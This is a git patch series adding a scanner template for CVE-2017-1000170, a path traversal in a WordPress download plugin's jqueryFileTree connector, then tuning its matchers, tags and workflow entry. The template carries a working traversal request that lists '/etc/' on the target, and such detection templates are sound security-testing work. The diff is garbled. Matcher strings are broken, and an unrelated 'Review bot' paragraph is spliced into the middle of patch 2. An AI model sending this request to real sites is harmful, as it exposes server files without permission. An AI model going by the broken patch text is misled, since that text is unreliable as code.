From 53c0e1e954338b2e025817903dc0a6130f20516e Mon Sep 17 00:00:00 2001
From: Dwi Siswanto
Date: Tue, 23 Mar 2021 19:56:42 +0700
Subject: [PATCH 1/4] :fire: Add CVE-2017-1000170
---
cves/2017/CVE-2017-1000170.yaml | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 cves/2017/CVE-2017-1000170.yaml
diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml
new file mode 100644
index 0000000000..ce1200b69f
--- /dev/null
+++ b/cves/2017/CVE-2017-1000170.yaml
@@ -0,0 +1,25 @@
+id: CVE-2017-1000170
+
+info:
+ name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
+ author: dwisiswant0
+ severity: high
+ reference: https://www.exploit-db.com/exploits/49693
+ description: jqueryFileTree 2.1.5 and older Directory Traversal
+ tags: cve,cve2017,wp-plugin,traversal
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
+ body: "dir=%2Fetc%2F&onlyFiles=true"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "
  • " + condition: and + part: body + - type: status + status: + - 200 \ No newline at end of file From 2e233a0aa2a0932ae0505ae919f30d5d26dda904 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:56:56 +0700 Subject: [PATCH 2/4] :hammer: Update matchers --- cves/2017/CVE-2017-1000170.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index ce1200b69f..c92526fa51 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -18,6 +18,7 @@ requests: - type: word words: - "
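Review bot: The probe in `body` lists `/etc/` (`dir=%2Fetc%2F`), so a vulnerable connector on a non-Unix host returns no match, and the template gives no hint that a miss is inconclusive. I would add a comment above `body`, e.g. `# Unix-only probe: no match does not show the connector is patched`, so a clean scan is not read as proof of remediation. The `info` block cites only the Exploit-DB entry; an advisory link for the CVE id as a second `reference` item and a `description` that names the affected connector file would make triage easier. The file is also committed without a trailing newline.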
  • " + - "passwd
  • " condition: and part: body - type: status From e49b4a7d8aa315158ca6ff4c8acbdfcd6ce926b2 Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 23 Mar 2021 19:57:15 +0700 Subject: [PATCH 3/4] :pencil2: Add wordpress to tags --- cves/2017/CVE-2017-1000170.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index c92526fa51..dc365005e0 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -6,7 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wp-plugin,traversal + tags: cve,cve2017,wordpress,wp-plugin,traversal requests: - method: POST From 86ad55d66fc836b89c6c4b3974579eda53202ca1 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 24 Mar 2021 14:07:22 +0530 Subject: [PATCH 4/4] Adding to workflow --- cves/2017/CVE-2017-1000170.yaml | 2 +- workflows/wordpress-workflow.yaml | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-1000170.yaml b/cves/2017/CVE-2017-1000170.yaml index dc365005e0..cb3e001dd0 100644 --- a/cves/2017/CVE-2017-1000170.yaml +++ b/cves/2017/CVE-2017-1000170.yaml @@ -6,7 +6,7 @@ info: severity: high reference: https://www.exploit-db.com/exploits/49693 description: jqueryFileTree 2.1.5 and older Directory Traversal - tags: cve,cve2017,wordpress,wp-plugin,traversal + tags: cve,cve2017,wordpress,wp-plugin,lfi requests: - method: POST diff --git a/workflows/wordpress-workflow.yaml b/workflows/wordpress-workflow.yaml index 4249d902c9..e6aa4f7d72 100644 --- a/workflows/wordpress-workflow.yaml +++ b/workflows/wordpress-workflow.yaml 
@@ -11,6 +11,7 @@ workflows: matchers: - name: wordpress subtemplates: + - template: cves/2017/CVE-2017-1000170.yaml - template: cves/2018/CVE-2018-3810.yaml - template: cves/2019/CVE-2019-6112.yaml - template: cves/2019/CVE-2019-6715.yaml